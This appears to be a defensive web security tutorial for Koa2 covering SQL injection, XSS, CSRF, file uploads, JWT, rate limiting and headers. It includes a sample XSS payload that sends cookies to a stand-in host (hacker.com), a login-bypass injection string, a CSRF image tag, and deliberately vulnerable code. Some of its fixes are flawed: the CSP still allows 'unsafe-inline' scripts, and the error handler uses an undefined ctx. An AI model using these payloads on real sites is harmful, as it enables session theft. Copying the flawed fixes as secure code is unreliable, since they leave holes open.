Analysis of Common Web Security Threats

Common Web Security Threat Analysis

Web security threats are critical issues developers must address when building applications. As a lightweight Node.js framework, Koa2 provides a concise middleware mechanism, but developers still need to proactively defend against various attack vectors. Below, we analyze typical threats and defense strategies based on real-world attack scenarios.

SQL Injection Attacks

SQL injection manipulates database query logic by constructing malicious input. Consider a Koa2 login endpoint:

app.use(async (ctx) => {
  const username = ctx.query.username;
  const password = ctx.query.password;
  
  // Dangerous! Direct SQL concatenation
  const sql = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;
  const result = await db.query(sql);
  
  if (result.length > 0) {
    ctx.body = 'Login successful';
  } else {
    ctx.body = 'Authentication failed';
  }
});

When an attacker inputs admin'-- as the username, the SQL becomes:

SELECT * FROM users WHERE username='admin'--' AND password='any_value'

Defense Strategies:

1. Use parameterized queries:

const sql = `SELECT * FROM users WHERE username=? AND password=?`;
await db.query(sql, [username, password]);

2. Use ORM libraries like Sequelize:

User.findOne({ where: { username, password } });

XSS (Cross-Site Scripting) Attacks

Stored XSS example: User submits a malicious comment:

<script>fetch('https://hacker.com/steal?cookie='+document.cookie)</script>

Koa2 Defense Measures:

1. Use koa-helmet to set CSP headers:

const helmet = require('koa-helmet');
app.use(helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    scriptSrc: ["'self'", "'unsafe-inline'"]
  }
}));

2. Automatic escaping in template engines (e.g., EJS):

<%= userComment %>  <!-- Automatically escapes special characters -->

CSRF (Cross-Site Request Forgery)

Attacker tricks users into making unintended requests:

<img src="https://your-site.com/transfer?to=hacker&amount=10000">

Koa2 Solutions:

1. Use koa-csrf middleware:

const CSRF = require('koa-csrf');
app.use(new CSRF({
  invalidTokenMessage: 'Invalid CSRF token',
  invalidTokenStatusCode: 403
}));

// Forms must include _csrf field
app.use(async (ctx) => {
  ctx.body = `
    <form action="/transfer" method="POST">
      <input type="hidden" name="_csrf" value="${ctx.csrf}">
      <!-- Other fields -->
    </form>
  `;
});

File Upload Vulnerabilities

Insecure file upload handling:

const upload = require('koa-multer')({ dest: 'uploads/' });
app.use(upload.single('file'));

app.use(async (ctx) => {
  // No file type validation
  fs.renameSync(ctx.file.path, `public/${ctx.file.originalname}`);
});

Attackers could upload .php files to execute server-side code.

Security Improvements:

const upload = multer({
  limits: { fileSize: 1024 * 1024 },
  fileFilter: (req, file, cb) => {
    const allowedTypes = ['image/jpeg', 'image/png'];
    if (!allowedTypes.includes(file.mimetype)) {
      return cb(new Error('Invalid file type'));
    }
    cb(null, true);
  }
});

Insecure Dependency Packages

Check package.json for potential risks:

1. Use npm audit to scan for vulnerabilities
2. Lock dependency versions:

"dependencies": {
  "koa": "2.13.4",
  "koa-router": "7.4.0"
}

Information Leakage Issues

Misconfiguration exposing sensitive data:

// Bad practice: Display stack traces
app.on('error', (err) => {
  ctx.body = err.stack;
});

// Correct approach
app.on('error', (err) => {
  console.error(err);
  ctx.status = 500;
  ctx.body = 'Internal Server Error';
});

Authentication and Session Management

Common pitfalls:

1. Weak password policies
2. Session fixation attacks

JWT Security Practices:

const jwt = require('jsonwebtoken');
app.use(async (ctx) => {
  const token = jwt.sign(
    { userId: 123 },
    process.env.JWT_SECRET,
    { expiresIn: '1h', algorithm: 'HS256' }
  );
  
  ctx.cookies.set('token', token, {
    httpOnly: true,
    secure: process.env.NODE_ENV === 'production'
  });
});

Rate Limiting Protection

Prevent brute-force attacks:

const ratelimit = require('koa-ratelimit');
app.use(ratelimit({
  driver: 'memory',
  db: new Map(),
  duration: 60000,
  max: 100,
  disableHeader: false
}));

HTTP Security Headers Configuration

Enhance security with koa-helmet:

app.use(helmet({
  hsts: { maxAge: 31536000, includeSubDomains: true },
  xssFilter: true,
  noSniff: true
}));

Logging and Monitoring

Record critical security events:

app.use(async (ctx, next) => {
  const start = Date.now();
  await next();
  const ms = Date.now() - start;
  
  console.log(`${ctx.method} ${ctx.url} - ${ms}ms`);
  if (ctx.status >= 400) {
    securityLogger.warn(`Suspicious request: ${ctx.ip} ${ctx.status}`);
  }
});